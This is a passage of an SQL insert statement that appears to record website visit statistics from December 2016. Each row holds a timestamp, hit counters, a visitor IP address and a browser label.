4.223','other'),(78189,1481386233,1,1,0,0,'157.55.39.209','other'),(78190,1481387664,1,0,1,0,'66.249.69.56',''),(78191,1481390345,1,1,0,0,'66.102.9.29','other'),(78192,1481390571,1,1,0,0,'66.249.75.107','chrome'),(78193,1481390739,1,0,1,0,'66.249.75.104',''),(78194,1481391039,1,1,0,0,'180.76.15.31','other'),(78195,1481391524,1,1,0,0,'130.193.50.34','other'),(78196,1481391684,1,1,0,0,'130.193.51.19','other'),(78197,1481397315,1,1,0,0,'141.8.142.61','other'),(78198,1481397328,1,1,0,0,'149.202.72.198','firefox'),(78199,1481400855,1,1,0,0,'46.201.112.210','firefox'),(78200,1481401215,1,1,0,0,'163.172.64.187','other'),(78201,1481401437,1,1,0,0,'163.172.64.233','other'),(78202,1481403693,1,1,0,0,'141.8.142.61','other'),(78203,1481404789,1,1,0,0,'163.172.64.241','other'),(78204,1481405259,1,1,0,0,'66.102.9.29','other'),(78205,1481405478,1,1,0,0,'141.8.183.25','other'),(78206,1481406978,1,0,1,0,'66.249.66.84',''),(78207,1481407837,1,1,0,0,'141.8.183.25','other'),(78208,1481408465,1,1,0,0,'163.172.64.220','other'),(78209,1481409293,1,1,0,0,'157.55.39.207','other'),(78210,1481410113,1,1,0,0,'141.8.142.61','other'),(78211,1481412659,1,1,0,0,'163.172.64.182','other'),(78212,1481415758,1,1,0,0,'130.193.50.34','other'),(78213,1481418953,1,1,0,0,'157.55.39.210','other'),(78214,1481419206,1,1,0,0,'66.102.9.27','other'),(78215,1481422866,6,6,0,0,'46.119.127.215','opera'),(78216,1481423315,1,1,0,0,'66.249.66.81','chrome'),(78217,1481427542,1,1,0,0,'66.249.66.81','chrome'),(78218,1481429426,1,1,0,0,'141.8.142.58','other'),(78219,1481429446,1,1,0,0,'66.249.66.84','chrome'),(78220,1481431522,1,0,1,0,'66.249.66.84',''),(78221,1481431817,1,0,1,0,'66.249.66.87',''),(78222,1481432721,1,1,0,0,'93.158.152.84','other'),(78223,1481433266,1,1,0,0,'66.102.9.27','other'),(78224,1481434516,1,0,1,0,'66.249.66.84',''),(78225,1481434849,1,1,0,0,'66.102.9.27','chrome'),(78226,1481434958,1,1,0,0,'92.113.126.208','chrome'),(78227,1481436325,1,1,0,0,'92.113.126.208','chrome'),(78228,1481436494,1,1,0,0,'130.193.50.34','other'),(78229,1481437091,1,1,0,0,'163.172.64.223','other'),(78230,1481437111,2,0,2,0,'66.249.66.81',''),(78231,1481438591,1,1,0,0,'66.249.66.84','chrome'),(78232,1481444540,1,0,1,0,'66.249.66.84',''),(78233,1481445219,1,0,1,0,'68.180.228.223',''),(78234,1481446125,1,1,0,0,'91.196.178.40','firefox'),(78235,1481447472,1,1,0,0,'176.122.122.116','chrome'),(78236,1481447490,1,1,0,0,'141.8.142.58','other'),(78237,1481448003,1,1,0,0,'157.55.39.86','other'),(78238,1481448306,1,1,0,0,'66.102.9.27','other'),(78239,1481448499,1,0,1,0,'68.180.228.223',''),(78240,1481451166,1,1,0,0,'217.165.183.229','chrome'),(78241,1481454983,1,0,1,0,'66.249.66.87',''),(78242,1481456242,1,1,0,0,'157.55.39.86','other'),(78243,1481457982,2,0,2,0,'66.249.66.84',''),(78244,1481458724,1,1,0,0,'163.172.64.187','other'),(78245,1481458977,1,1,0,0,'91.196.178.39','chrome'),(78246,1481459136,1,0,1,0,'66.249.66.87',''),(78247,1481459202,1,1,0,0,'163.172.64.254','other'),(78248,1481459374,1,1,0,0,'180.76.15.161','other'),(78249,1481460310,1,1,0,0,'91.196.178.39','chrome'),(78250,1481462611,1,1,0,0,'130.180.220.218','chrome'),(78251,1481462730,1,1,0,0,'66.102.9.25','other'),(78252,1481465253,1,0,1,0,'66.249.66.81',''),(78253,1481471298,1,1,0,0,'91.196.178.39','chrome'),(78254,1481471349,1,1,0,0,'66.249.83.76','chrome'),(78255,1481471350,1,1,0,0,'66.249.83.75','chrome'),(78256,1481472898,1,1,0,0,'46.211.141.33','chrome'),(78257,1481475016,1,0,1,0,'66.249.66.81',''),(78258,1481475703,1,1,0,0,'46.211.0.12','chrome'),(78259,1481476465,1,0,1,0,'66.249.66.84',''),(78260,1481479399,1,1,0,0,'92.112.104.238','chrome'),(78261,1481479416,1,1,0,0,'141.8.142.67','other'),(78262,1481480136,1,1,0,0,'178.255.215.94','other'),(78263,1481483749,1,1,0,0,'95.134.184.176','chrome'),(78264,1481485127,1,1,0,0,'94.100.209.17','chrome'),(78265,1481485733,1,1,0,0,'91.196.178.65','chrome'),(78266,1481485963,1,0,1,0,'66.249.66.180',''),(78267,1481486253,1,0,1,0,'66.249.66.81',''),(78268,1481487564,2,2,0,0,'95.134.184.176','chrome'),(78269,1481487901,1,1,0,0,'91.196.178.68','chrome'),(78270,1481488504,1,1,0,0,'95.134.184.176','chrome'),(78271,1481493993,1,0,1,0,'66.249.66.87',''),(78272,1481494217,1,0,1,0,'66.249.66.84',''),(78273,1481495497,1,1,0,0,'40.77.167.12','other'),(78274,1481496800,1,0,1,0,'66.249.66.84',''),(78275,1481497152,1,0,1,0,'66.249.66.81',''),(78276,1481497264,1,0,1,0,'66.249.66.87',''),(78277,1481498206,1,1,0,0,'66.102.9.27','other'),(78278,1481498516,1,1,0,0,'180.76.15.157','other'),(78279,1481500011,1,0,1,0,'66.249.66.81',''),(78280,1481500466,1,1,0,0,'40.77.167.0','other'),(78281,1481500765,1,0,1,0,'66.249.66.84',''),(78282,1481501722,1,0,1,0,'66.249.66.81',''),(78283,1481501781,1,1,0,0,'66.102.9.25','other'),(78284,1481503526,1,0,1,0,'66.249.66.87',''),(78285,1481505412,1,1,0,0,'66.102.9.27','other'),(78286,1481506168,1,0,1,0,'66.249.66.87',''),(78287,1481507113,1,1,0,0,'180.76.15.160','other'),(78288,1481508765,1,0,1,0,'66.249.66.84',''),(78289,1481508974,1,1,0,0,'66.102.9.25','other'),(78290,1481509463,1,1,0,0,'217.69.136.203','other'),(78291,1481510597,1,0,1,0,'66.249.66.81',''),(78292,1481512283,1,0,1,0,'68.180.228.223',''),(78293,1481512363,1,0,1,0,'66.249.66.87',''),(78294,1481512623,1,1,0,0,'66.102.9.27','other'),(78295,1481512730,1,0,1,0,'66.249.66.84',''),(78296,1481515027,1,1,0,0,'66.102.9.25','other'),(78297,1481515096,1,1,0,0,'207.46.13.86','other'),(78298,1481515168,2,0,2,0,'66.249.66.84',''),(78299,1481515266,1,1,0,0,'91.196.178.35','chrome'),(78300,1481515689,1,0,1,0,'66.249.66.87',''),(78301,1481516118,2,2,0,0,'46.165.197.142','other'),(78302,1481516303,1,1,0,0,'195.154.181.162','chrome'),(78303,1481516381,1,1,0,0,'141.8.142.58','other'),(78304,1481516947,1,0,1,0,'66.249.66.84',''),(78305,1481517081,1,0,1,0,'68.180.228.223',''),(78306,1481517587,2,0,2,0,'66.249.66.87',''),(78307,1481519816,1,1,0,0,'66.102.9.25','other'),(78308,1481521021,1,1,0,0,'157.55.39.124','other'),(78309,1481523420,1,1,0,0,'66.102.9.29','other'),(78310,1481524390,1,1,0,0,'94.179.74.206','chrome'),(78311,1481525015,1,0,1,0,'66.249.66.87',''),(78312,1481525082,2,0,2,0,'66.249.66.84',''),(78313,1481525942,1,0,1,0,'66.249.66.81',''),(78314,1481526421,1,1,0,0,'66.102.9.27','chrome'),(78315,1481526535,1,0,1,0,'66.249.66.84',''),(78316,1481526732,1,1,0,0,'37.55.59.1','chrome'),(78317,1481527017,1,1,0,0,'66.102.9.29','other'),(78318,1481527644,1,0,1,0,'66.249.66.84',''),(78319,1481528353,1,1,0,0,'89.19.115.73','chrome'),(78320,1481528456,1,1,0,0,'94.179.51.239','chrome'),(78321,1481528757,1,1,0,0,'66.102.9.29','chrome'),(78322,1481528944,1,1,0,0,'82.207.91.234','firefox'),(78323,1481529395,1,1,0,0,'66.249.66.81','chrome'),(78324,1481530306,1,1,0,0,'46.201.112.210','firefox'),(78325,1481530639,1,1,0,0,'66.102.9.25','other'),(78326,1481530645,1,1,0,0,'91.196.178.136','firefox'),(78327,1481531149,1,0,1,0,'66.249.66.81',''),(78328,1481531205,1,1,0,0,'194.242.96.210','chrome'),(78329,1481531221,1,1,0,0,'130.193.50.34','other'),(78330,1481531441,1,1,0,0,'80.91.188.10','chrome'),(78331,1481531602,1,1,0,0,'94.179.102.237','firefox'),(78332,1481531678,1,1,0,0,'91.196.178.72','chrome'),(78333,1481532405,1,1,0,0,'95.132.54.183','chrome'),(78334,1481532751,1,1,0,0,'93.158.152.84','other'),(78335,1481532787,1,1,0,0,'141.8.183.19','other'),(78336,1481533580,1,1,0,0,'91.196.178.69','chrome'),(78337,1481533615,1,1,0,0,'130.193.37.7','other'),(78338,1481533925,1,0,1,0,'66.249.66.84',''),(78339,1481533952,1,0,1,0,'66.249.66.81',''),(78340,1481534025,1,1,0,0,'46.174.121.103','chrome'),(78341,1481534464,1,1,0,0,'66.102.9.27','other'),(78342,1481534684,1,0,1,0,'66.249.66.87',''),(78343,1481535387,1,1,0,0,'95.135.241.128','opera'),(78344,1481535504,1,1,0,0,'91.196.177.26','chrome'),(78345,1481535936,1,1,0,0,'91.196.178.66','firefox'),(78346,1481536173,1,1,0,0,'141.8.142.58','other'),(78347,1481536684,1,0,1,0,'66.249.66.84',''),(78348,1481537120,1,1,0,0,'46.200.150.55','chrome'),(78349,1481537127,1,1,0,0,'141.8.142.58','other'),(78350,1481540047,1,1,0,0,'95.134.214.93','chrome'),(78351,1481540055,1,1,0,0,'141.8.142.58','other'),(78352,1481540152,1,1,0,0,'37.53.231.249','firefox'),(78353,1481540828,1,0,1,0,'66.249.66.87',''),(78354,1481541499,1,1,0,0,'66.102.9.27','other'),(78355,1481543156,1,1,0,0,'46.200.150.55','chrome'),(78356,1481543972,1,0,1,0,'66.249.66.84',''),(78357,1481544552,1,1,0,0,'95.135.213.243','chrome'),(78358,1481544786,1,1,0,0,'78.111.187.63','opera'),(78359,1481544798,1,1,0,0,'130.193.50.34','other'),(78360,1481545163,1,0,1,0,'66.249.66.84',''),(78361,1481545362,1,1,0,0,'66.102.9.29','other'),(78362,1481546024,1,0,1,0,'66.249.66.81',''),(78363,1481546183,1,1,0,0,'91.196.177.46','chrome'),(78364,1481547251,1,1,0,0,'91.196.178.69','chrome'),(78365,1481547903,2,0,2,0,'66.249.66.81',''),(78366,1481548049,1,1,0,0,'82.145.221.128','chrome'),(78367,1481548055,1,1,0,0,'130.193.50.34','other'),(78368,1481548201,1,1,0,0,'91.196.177.46','chrome'),(78369,1481548398,1,0,1,0,'66.249.66.84',''),(78370,1481548410,1,1,0,0,'91.196.177.94','chrome'),(78371,1481548450,1,0,1,0,'66.249.66.87',''),(78372,1481548655,1,1,0,0,'66.102.9.27','other'),(78373,1481549195,1,1,0,0,'91.196.178.169','opera'),(78374,1481549262,1,1,0,0,'157.55.39.85','other'),(78375,1481549417,1,1,0,0,'91.196.178.166','firefox'),(78376,1481549923,1,0,1,0,'66.249.66.182',''),(78377,1481549939,1,0,1,0,'66.249.66.202',''),(78378,1481550446,5,5,0,0,'94.23.19.178','other'),(78379,1481550652,1,0,1,0,'66.249.66.185',''),(78380,1481551216,1,1,0,0,'91.196.177.94','chrome'),(78381,1481551948,1,1,0,0,'207.46.13.136','other'),(78382,1481552267,1,1,0,0,'66.102.9.27','other'),(78383,1481553168,1,1,0,0,'91.196.178.69','firefox'),(78384,1481553285,1,1,0,0,'91.196.178.40','firefox'),(78385,1481553504,1,0,1,0,'66.249.66.185',''),(78386,1481553883,1,1,0,0,'91.192.44.70','chrome'),(78387,1481554210,1,0,1,0,'66.249.66.197',''),(78388,1481554240,1,0,1,0,'66.249.66.182',''),(78389,1481554507,1,1,0,0,'40.77.167.33','other'),(78390,1481555360,1,1,0,0,'66.249.66.185','chrome'),(78391,1481555386,1,1,0,0,'37.53.122.15','chrome'),(78392,1481555422,1,1,0,0,'5.45.192.65','chrome'),(78393,1481555825,1,1,0,0,'66.102.9.27','other'),(78394,1481556205,1,1,0,0,'91.196.178.72','chrome'),(78395,1481556785,1,0,1,0,'66.249.66.188',''),(78396,1481556794,1,0,1,0,'66.249.66.185',''),(78397,1481557970,1,0,1,0,'66.249.66.185',''),(78398,1481558067,1,0,1,0,'66.249.66.182',''),(78399,1481558373,1,1,0,0,'91.196.178.66','firefox'),(78400,1481558374,1,1,0,0,'91.196.178.33','chrome'),(78401,1481558376,1,0,1,0,'66.249.66.188',''),(78402,1481559771,1,1,0,0,'66.102.9.27','other'),(78403,1481562478,1,0,1,0,'66.249.66.185',''),(78404,1481563019,1,1,0,0,'66.102.9.29','other'),(78405,1481563414,1,0,1,0,'66.249.66.202',''),(78406,1481563557,1,0,1,0,'66.249.66.188',''),(78407,1481563560,2,0,2,0,'66.249.66.182',''),(78408,1481563931,1,1,0,0,'91.240.48.46','chrome'),(78409,1481563950,1,1,0,0,'141.8.142.67','other'),(78410,1481563954,1,1,0,0,'141.8.142.58','other'),(78411,1481564138,1,0,1,0,'66.249.66.185',''),(78412,1481566863,1,1,0,0,'66.102.9.29','other'),(78413,1481567285,1,1,0,0,'95.132.133.232','chrome'),(78414,1481570253,1,1,0,0,'66.102.9.29','other'),(78415,1481570593,1,0,1,0,'66.249.66.182',''),(78416,1481572505,1,0,1,0,'66.249.76.30',''),(78417,1481572550,1,1,0,0,'95.132.135.152','firefox'),(78418,1481573848,1,1,0,0,'66.102.9.29','other'),(78419,1481577119,1,1,0,0,'157.55.39.68','other'),(78420,1481577443,1,1,0,0,'66.102.9.29','other'),(78421,1481581154,1,1,0,0,'66.102.9.29','other'),(78422,1481581431,1,1,0,0,'69.30.210.242','other'),(78423,1481583429,1,1,0,0,'66.249.76.30','chrome'),(78424,1481584231,1,1,0,0,'157.55.39.148','other'),(78425,1481584636,1,1,0,0,'66.102.9.29','other'),(78426,1481585972,1,1,0,0,'188.32.97.55','msie'),(78427,1481586800,1,1,0,0,'130.193.51.19','other'),(78428,1481587453,1,1,0,0,'66.249.76.109','chrome'),(78429,1481588523,1,1,0,0,'66.102.9.29','other'),(78430,1481588603,1,1,0,0,'95.24.237.53','msie'),(78431,1481589424,1,1,0,0,'95.84.145.150','msie'),(78432,1481590167,1,0,1,0,'66.249.76.30',''),(78433,1481591501,1,1,0,0,'157.55.39.147','other'),(78434,1481591822,1,1,0,0,'66.102.9.29','other'),(78435,1481592434,1,1,0,0,'40.77.167.60','other'),(78436,1481594800,1,1,0,0,'66.249.76.30','chrome'),(78437,1481595434,1,1,0,0,'66.102.9.27','other'),(78438,1481599065,1,1,0,0,'66.102.9.27','other'),(78439,1481601941,1,1,0,0,'40.77.167.60','other'),(78440,1481602691,1,1,0,0,'66.102.9.27','other'),(78441,1481603607,1,1,0,0,'95.132.134.83','chrome'),(78442,1481606233,1,1,0,0,'178.255.215.94','other'),(78443,1481606388,1,1,0,0,'66.102.9.25','other'),(78444,1481611463,1,1,0,0,'66.102.9.29','chrome'),(78445,1481612067,1,1,0,0,'91.196.178.72','firefox'),(78446,1481612238,1,1,0,0,'94.179.103.228','chrome'),(78447,1481613154,1,1,0,0,'178.137.87.242','firefox'),(78448,1481614507,1,1,0,0,'69.30.234.74','firefox'),(78449,1481614581,1,0,1,0,'66.249.76.28',''),(78450,1481614672,1,1,0,0,'91.196.177.26','chrome'),(78451,1481615532,1,1,0,0,'66.102.9.25','other'),(78452,1481616905,1,1,0,0,'93.74.212.147','firefox'),(78453,1481618734,1,1,0,0,'66.102.9.29','other'),(78454,1481620162,1,1,0,0,'180.76.15.151','other'),(78455,1481620685,1,1,0,0,'91.196.178.72','firefox'),(78456,1481621910,1,1,0,0,'95.133.25.50','firefox'),(78457,1481621920,1,1,0,0,'130.193.51.19','other'),(78458,1481622298,1,1,0,0,'37.53.230.124','firefox'),(78459,1481622413,1,1,0,0,'66.102.9.29','other'),(78460,1481624009,1,1,0,0,'5.45.255.86','chrome'),(78461,1481624064,1,1,0,0,'91.196.178.72','firefox'),(78462,1481625168,1,1,0,0,'195.211.175.37','chrome'),(78463,1481627399,1,1,0,0,'91.196.178.131','firefox'),(78464,1481628037,1,1,0,0,'91.227.180.194','chrome'),(78465,1481628239,1,1,0,0,'91.196.178.165','chrome'),(78466,1481629645,1,1,0,0,'130.180.218.203','firefox'),(78467,1481629715,1,1,0,0,'180.76.15.6','other'),(78468,1481630046,1,0,1,0,'66.249.76.109',''),(78469,1481630170,1,1,0,0,'91.196.178.66','firefox'),(78470,1481631432,1,1,0,0,'78.111.190.158','chrome'),(78471,1481633009,1,1,0,0,'31.43.225.10','chrome'),(78472,1481635037,1,1,0,0,'66.249.76.30','chrome'),(78473,1481635608,1,1,0,0,'46.201.112.210','firefox'),(78474,1481635934,1,0,1,0,'66.249.76.29',''),(78475,1481637593,1,1,0,0,'46.165.197.142','other'),(78476,1481640333,1,1,0,0,'66.102.9.29','other'),(78477,1481640871,1,1,0,0,'95.135.42.50','chrome'),(78478,1481643345,1,1,0,0,'78.111.190.158','chrome'),(78479,1481643690,1,1,0,0,'91.196.178.68','firefox'),(78480,1481645529,1,1,0,0,'5.45.192.73','chrome'),(78481,1481646267,1,1,0,0,'91.196.178.167','chrome'),(78482,1481646753,1,1,0,0,'95.132.149.171','chrome'),(78483,1481647366,1,1,0,0,'91.196.178.167','chrome'),(78484,1481648399,1,1,0,0,'95.132.69.228','chrome'),(78485,1481648908,1,1,0,0,'94.179.73.174','firefox'),(78486,1481650232,1,1,0,0,'130.193.50.34','other'),(78487,1481651055,1,1,0,0,'91.196.178.68','chrome'),(78488,1481651527,1,1,0,0,'141.8.183.19','other'),(78489,1481651576,1,1,0,0,'91.196.178.33','firefox'),(78490,1481655151,1,1,0,0,'94.179.2.64','chrome'),(78491,1481655552,1,1,0,0,'91.196.178.33','chrome'),(78492,1481656256,1,1,0,0,'40.77.167.81','other'),(78493,1481658661,1,1,0,0,'178.255.215.94','other'),(78494,1481658786,2,1,1,0,'66.249.64.179',''),(78495,1481660173,1,1,0,0,'91.196.178.36','chrome'),(78496,1481661399,1,1,0,0,'95.132.149.171','chrome'),(78497,1481663938,1,1,0,0,'207.46.13.145','other'),(78498,1481665667,1,1,0,0,'207.46.13.143','other'),(78499,1481666302,1,1,0,0,'88.198.16.12','other'),(78500,1481667583,1,1,0,0,'144.76.29.162','other'),(78501,1481669391,1,1,0,0,'207.46.13.145','other'),(78502,1481672121,1,1,0,0,'207.46.13.142','other'),(78503,1481672491,2,2,0,0,'94.25.231.50','chrome'),(78504,1481674249,1,1,0,0,'188.163.87.77','chrome'),(78505,1481676837,1,1,0,0,'178.255.215.94','other'),(78506,1481678104,1,0,1,0,'66.249.64.187',''),(78507,1481679580,1,1,0,0,'178.255.215.94','other'),(78508,1481679598,1,0,1,0,'66.249.64.187',''),(78509,1481682271,1,1,0,0,'66.249.64.187','chrome'),(78510,1481683390,2,0,2,0,'66.249.64.187',''),(78511,1481683804,1,1,0,0,'66.249.64.183','chrome'),(78512,1481683854,1,1,0,0,'178.255.215.94','other'),(78513,1481686991,1,1,0,0,'82.145.221.178','other'),(78514,1481687995,1,1,0,0,'141.8.142.67','other'),(78515,1481689443,1,1,0,0,'66.102.9.29','chrome'),(78516,1481689812,1,1,0,0,'178.255.215.94','other'),(78517,1481690266,1,1,0,0,'66.249.64.179','chrome'),(78518,1481691302,1,1,0,0,'180.76.15.27','other'),(78519,1481691428,1,1,0,0,'175.143.137.42','firefox'),(78520,1481694616,1,1,0,0,'91.196.178.71','firefox'),(78521,1481695856,1,1,0,0,'91.196.178.65','firefox'),(78522,1481696622,1,1,0,0,'178.93.42.255','firefox'),(78523,1481697372,1,1,0,0,'91.196.178.68','firefox'),(78524,1481699560,1,1,0,0,'91.196.178.65','firefox'),(78525,1481699714,1,1,0,0,'195.149.70.22','other'),(78526,1481699929,1,1,0,0,'217.77.210.162','chrome'),(78527,1481700953,1,1,0,0,'91.196.178.71','chrome'),(78528,1481702336,1,0,1,0,'66.249.64.57',''),(78529,1481702464,1,1,0,0,'91.196.178.71','chrome'),(78530,1481703091,1,0,1,0,'66.249.64.187',''),(78531,1481703556,1,1,0,0,'130.180.216.7','chrome'),(78532,1481703671,60,60,0,0,'51.255.194.33','other'),(78533,1481703804,1,1,0,0,'130.193.51.19','other'),(78534,1481703809,1,1,0,0,'141.8.183.25','other'),(78535,1481705425,1,1,0,0,'46.201.112.210','firefox'),(78536,1481706279,1,1,0,0,'92.113.174.213','chrome'),(78537,1481707522,1,1,0,0,'37.53.231.196','chrome'),(78538,1481707558,1,1,0,0,'130.193.50.34','other'),(78539,1481708979,1,0,1,0,'68.180.229.190',''),(78540,1481709339,1,1,0,0,'108.59.8.70','other'),(78541,1481710035,1,1,0,0,'66.249.64.187','chrome'),(78542,1481713306,1,1,0,0,'46.133.163.155','chrome'),(78543,1481713319,1,1,0,0,'31.42.179.162','chrome'),(78544,1481713364,1,1,0,0,'163.172.64.193','other'),(78545,1481714094,1,1,0,0,'46.219.252.122','chrome'),(78546,1481714213,1,1,0,0,'130.180.209.59','chrome'),(78547,1481714219,1,1,0,0,'130.193.50.34','other'),(78548,1481714307,1,1,0,0,'130.180.216.7','chrome'),(78549,1481714980,1,1,0,0,'66.249.64.183','chrome'),(78550,1481715760,1,1,0,0,'157.55.39.217','other'),(78551,1481716975,1,1,0,0,'91.196.178.65','firefox'),(78552,1481717239,1,1,0,0,'94.179.125.213','chrome'),(78553,1481717754,1,1,0,0,'91.196.177.26','chrome'),(78554,1481718159,1,1,0,0,'180.76.15.32','other'),(78555,1481718818,1,1,0,0,'78.111.190.3','chrome'),(78556,1481719611,1,1,0,0,'37.55.77.102','chrome'),(78557,1481719612,1,1,0,0,'46.201.112.210','firefox'),(78558,1481719668,1,1,0,0,'37.53.230.124','firefox'),(78559,1481720549,1,1,0,0,'163.172.64.192','other'),(78560,1481720735,1,1,0,0,'163.172.64.181','other'),(78561,1481721283,1,1,0,0,'194.37.248.11','msie'),(78562,1481722978,1,1,0,0,'91.196.177.46','firefox'),(78563,1481723159,1,1,0,0,'178.93.130.61','chrome'),(78564,1481723662,1,1,0,0,'91.196.178.70','chrome'),(78565,1481724448,1,0,1,0,'66.249.64.187',''),(78566,1481724516,1,1,0,0,'46.201.112.210','firefox'),(78567,1481724525,1,1,0,0,'91.196.178.71','chrome'),(78568,1481724757,1,1,0,0,'46.133.163.155','chrome'),(78569,1481725087,1,1,0,0,'163.172.64.178','other'),(78570,1481725221,1,1,0,0,'163.172.64.185','other'),(78571,1481725448,1,1,0,0,'66.249.64.59','chrome'),(78572,1481726180,2,0,2,0,'66.249.64.61',''),(78573,1481726257,1,1,0,0,'31.41.94.56','chrome'),(78574,1481726505,1,1,0,0,'163.172.64.229','other'),(78575,1481726878,1,1,0,0,'176.96.198.78','chrome'),(78576,1481727292,1,1,0,0,'91.196.178.164','firefox'),(78577,1481727585,1,0,1,0,'66.249.64.183',''),(78578,1481727816,1,1,0,0,'91.196.178.70','chrome'),(78579,1481727981,1,1,0,0,'163.172.64.235','other'),(78580,1481728796,1,1,0,0,'91.196.178.65','firefox'),(78581,1481729126,1,1,0,0,'163.172.64.224','other'),(78582,1481729400,1,1,0,0,'91.196.178.167','chrome'),(78583,1481731420,1,1,0,0,'163.172.64.188','other'),(78584,1481732081,1,1,0,0,'163.172.64.243','other'),(78585,1481732412,1,1,0,0,'163.172.64.237','other'),(78586,1481732438,1,1,0,0,'66.249.64.59','chrome'),(78587,1481732945,1,1,0,0,'91.196.177.15','chrome'),(78588,1481733496,1,1,0,0,'163.172.64.237','other'),(78589,1481733693,1,1,0,0,'40.77.167.30','other'),(78590,1481734640,1,0,1,0,'66.249.64.183',''),(78591,1481735188,1,1,0,0,'91.196.178.33','chrome'),(78592,1481735309,1,1,0,0,'40.77.167.31','other'),(78593,1481735370,1,1,0,0,'163.172.64.226','other'),(78594,1481736033,1,0,1,0,'66.249.64.187',''),(78595,1481736077,1,1,0,0,'195.154.181.15','chrome'),(78596,1481736414,1,1,0,0,'163.172.64.179','other'),(78597,1481737569,1,1,0,0,'163.172.64.247','other'),(78598,1481738123,1,1,0,0,'188.40.95.70','other'),(78599,1481738436,1,1,0,0,'95.132.149.171','chrome'),(78600,1481739822,2,2,0,0,'46.4.116.197','other'),(78601,1481740080,1,1,0,0,'217.69.133.6','other'),(78602,1481740496,1,0,1,0,'66.249.76.108',''),(78603,1481740566,1,1,0,0,'163.172.64.252','other'),(78604,1481741034,1,1,0,0,'46.211.67.193','chrome'),(78605,1481741752,1,1,0,0,'163.172.64.199','other'),(78606,1481742269,1,1,0,0,'94.179.68.113','firefox'),(78607,1481743481,1,1,0,0,'163.172.64.228','other'),(78608,1481745893,1,0,1,0,'66.249.76.29',''),(78609,1481747555,1,1,0,0,'128.68.36.132','other'),(78610,1481747957,1,1,0,0,'178.255.215.94','other'),(78611,1481748930,1,1,0,0,'163.172.64.246','other'),(78612,1481748959,1,0,1,0,'66.249.76.108',''),(78613,1481752815,1,0,1,0,'66.249.76.29',''),(78614,1481755864,1,1,0,0,'31.43.24.241','chrome'),(78615,1481756262,1,0,1,0,'66.249.66.202',''),(78616,1481756359,1,0,1,0,'68.180.229.190',''),(78617,1481756865,2,0,2,0,'66.249.76.29',''),(78618,1481757159,1,1,0,0,'178.255.215.94','other'),(78619,1481757215,2,0,2,0,'66.249.76.28',''),(78620,1481757781,1,0,1,0,'66.249.66.188',''),(78621,1481757812,1,0,1,0,'66.249.66.182',''),(78622,1481758005,1,0,1,0,'66.249.76.29',''),(78623,1481760732,1,1,0,0,'176.193.110.98','chrome'),(78624,1481761128,1,1,0,0,'178.255.215.94','other'),(78625,1481761196,1,1,0,0,'163.172.64.224','other'),(78626,1481761300,1,1,0,0,'130.193.50.34','other'),(78627,1481761600,1,0,1,0,'68.180.228.223',''),(78628,1481762915,1,1,0,0,'207.46.13.160','other'),(78629,1481763281,1,1,0,0,'163.172.64.231','other'),(78630,1481764238,1,1,0,0,'163.172.64.223','other'),(78631,1481766534,1,1,0,0,'176.14.219.215','firefox'),(78632,1481766951,2,2,0,0,'69.30.213.82','other'),(78633,1481767187,1,1,0,0,'141.8.142.58','other'),(78634,1481768747,1,0,1,0,'66.249.76.28',''),(78635,1481770920,1,1,0,0,'207.46.13.212','other'),(78636,1481771567,1,1,0,0,'163.172.64.246','other'),(78637,1481772867,1,1,0,0,'180.76.15.7','other'),(78638,1481772869,1,1,0,0,'180.76.15.11','other'),(78639,1481773892,1,0,1,0,'66.249.76.29',''),(78640,1481774652,1,1,0,0,'46.229.168.70','other'),(78641,1481774997,1,1,0,0,'163.172.64.226','other'),(78642,1481775346,2,2,0,0,'54.200.233.227','chrome'),(78643,1481775943,1,1,0,0,'66.102.9.25','chrome'),(78644,1481779208,1,1,0,0,'163.172.64.199','other'),(78645,1481780466,1,1,0,0,'91.196.178.65','firefox'),(78646,1481781253,1,1,0,0,'94.180.192.181','msie'),(78647,1481783807,1,0,1,0,'66.249.76.29',''),(78648,1481783894,1,1,0,0,'157.55.39.199','other'),(78649,1481784511,1,1,0,0,'51.254.129.9','other'),(78650,1481784877,1,1,0,0,'91.196.178.164','chrome'),(78651,1481786795,1,1,0,0,'217.69.133.230','other'),(78652,1481787569,1,1,0,0,'91.196.178.65','firefox'),(78653,1481787631,1,1,0,0,'180.76.15.17','other'),(78654,1481787811,1,1,0,0,'46.229.168.74','other'),(78655,1481788638,1,1,0,0,'91.196.178.65','firefox'),(78656,1481788662,1,1,0,0,'66.249.76.29','chrome'),(78657,1481788713,1,1,0,0,'163.172.64.230','other'),(78658,1481790194,1,0,1,0,'66.249.66.188',''),(78659,1481792314,1,1,0,0,'162.210.196.98','other'),(78660,1481792917,1,1,0,0,'176.195.129.248','chrome'),(78661,1481793003,1,1,0,0,'91.239.77.45','chrome'),(78662,1481793458,1,1,0,0,'207.46.13.212','other'),(78663,1481794053,1,1,0,0,'163.172.64.177','other'),(78664,1481794336,1,1,0,0,'46.201.112.210','firefox'),(78665,1481795520,1,1,0,0,'91.196.177.46','firefox'),(78666,1481797109,1,0,1,0,'66.249.76.109',''),(78667,1481797226,1,1,0,0,'91.196.178.65','firefox'),(78668,1481797757,1,1,0,0,'146.52.206.97','other'),(78669,1481797884,1,1,0,0,'163.172.64.233','other'),(78670,1481797972,1,1,0,0,'91.196.178.68','firefox'),(78671,1481798664,1,1,0,0,'78.111.190.158','firefox'),(78672,1481798912,1,1,0,0,'46.201.112.210','firefox'),(78673,1481799991,1,1,0,0,'163.172.64.216','other'),(78674,1481800089,1,1,0,0,'176.195.125.185','chrome'),(78675,1481800732,1,1,0,0,'207.46.13.212','other'),(78676,1481800925,1,1,0,0,'91.196.178.164','chrome'),(78677,1481801427,1,1,0,0,'91.196.177.93','chrome'),(78678,1481802958,1,1,0,0,'46.201.240.112','firefox'),(78679,1481803012,2,0,2,0,'66.249.76.109',''),(78680,1481803522,1,1,0,0,'82.207.91.234','firefox'),(78681,1481803700,1,1,0,0,'180.76.15.26','other'),(78682,1481804755,1,1,0,0,'163.172.64.233','other'),(78683,1481805709,1,1,0,0,'180.76.15.160','other'),(78684,1481805866,1,1,0,0,'94.179.65.160','firefox'),(78685,1481805925,1,1,0,0,'37.54.18.224','chrome'),(78686,1481806100,1,1,0,0,'91.196.177.26','chrome'),(78687,1481806410,1,0,1,0,'66.249.76.30',''),(78688,1481806597,1,0,1,0,'66.249.76.28',''),(78689,1481806615,1,0,1,0,'66.249.76.29',''),(78690,1481807510,1,1,0,0,'141.8.183.25','other'),(78691,1481807695,1,1,0,0,'91.196.178.135','chrome'),(78692,1481807849,1,1,0,0,'157.55.39.199','other'),(78693,1481811628,1,1,0,0,'207.46.13.148','other'),(78694,1481812423,1,1,0,0,'109.169.29.30','other'),(78695,1481812714,1,1,0,0,'91.196.178.68','chrome'),(